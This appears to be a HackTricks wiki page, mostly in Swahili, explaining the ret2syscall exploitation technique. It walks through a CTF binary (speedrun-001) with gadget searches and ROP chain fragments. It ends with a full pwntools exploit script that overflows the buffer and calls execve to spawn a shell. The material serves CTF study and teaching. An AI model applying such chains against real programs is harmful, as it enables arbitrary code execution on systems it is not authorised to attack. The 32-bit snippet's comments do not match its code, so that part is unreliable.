Ret2syscall

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Hii ni sawa na Ret2lib, hata hivyo, katika kesi hii hatutakuwa tukitafuta kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa kimeandaliwa kuitisha syscall sys_execve na baadhi ya hoja ili kutekeleza /bin/sh. Mbinu hii kawaida hufanywa kwenye binaries ambazo zimeandikwa kwa njia ya static, hivyo kunaweza kuwa na gadgets nyingi na maagizo ya syscall.

Ili kuandaa wito wa syscall inahitajika usanidi ufuatao:

rax: 59 Specify sys_execve
rdi: ptr to "/bin/sh" specify file to execute
rsi: 0 specify no arguments passed
rdx: 0 specify no environment variables passed

Hivyo, kimsingi inahitajika kuandika mfuatano wa /bin/sh mahali fulani na kisha kutekeleza syscall (ukijua kuhusu padding inayohitajika kudhibiti stack). Kwa hili, tunahitaji gadget ya kuandika /bin/sh katika eneo lililojulikana.

Syscall nyingine ya kuvutia kuitisha ni mprotect ambayo ingemruhusu mshambuliaji kubadilisha ruhusa za ukurasa katika kumbukumbu. Hii inaweza kuunganishwa na ret2shellcode.

Register gadgets

Hebu tuanze kwa kutafuta jinsi ya kudhibiti hizo register:

ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret

Na hizi anwani, inawezekana kuandika maudhui kwenye stack na kuyapakia kwenye register.

Andika mfuatano

Kumbukumbu inayoweza kuandikwa

Kwanza unahitaji kutafuta mahali pa kuandika katika kumbukumbu.

gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]

Andika Msimbo katika kumbukumbu

Kisha unahitaji kupata njia ya kuandika maudhui yoyote katika anwani hii

ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx

Automate ROP chain

Amri ifuatayo inaunda mnyororo kamili wa sys_execve ROP ikitolewa kutoka kwa binary ya kudumu wakati kuna vifaa vya write-what-where na maagizo ya syscall:

ROPgadget --binary vuln --ropchain

32 bits

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''

rop += popRdx           # place value into EAX
rop += "/bin"           # 4 bytes at a time
rop += popRax           # place value into edx
rop += p32(0x6b6000)    # Writable memory
rop += writeGadget   #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget

64 bits

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx

Kukosa Gadgets

Ikiwa unakosa gadgets, kwa mfano kuandika /bin/sh katika kumbukumbu, unaweza kutumia mbinu ya SROP kudhibiti thamani zote za register (ikiwemo RIP na register za params) kutoka kwenye stack:

SROP - Sigreturn-Oriented Programming

Mfano wa Exploit

from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

'''
Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
'''

rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall


# Add the padding to the saved return address
payload = "0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)

target.interactive()

Mifano Mengine & Marejeo

https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html
64 bits, hakuna PIE, nx, andika katika kumbukumbu ROP ya kuita execve na kuruka huko.
https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html
64 bits, nx, hakuna PIE, andika katika kumbukumbu ROP ya kuita execve na kuruka huko. Ili kuandika kwenye stack, kazi inayofanya operesheni za kihesabu inakabiliwa.
https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
64 bits, hakuna PIE, nx, BF canary, andika katika kumbukumbu ROP ya kuita execve na kuruka huko.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousRet2lib + Printf leak - arm64 NextRet2syscall - ARM64

Last updated 4 months ago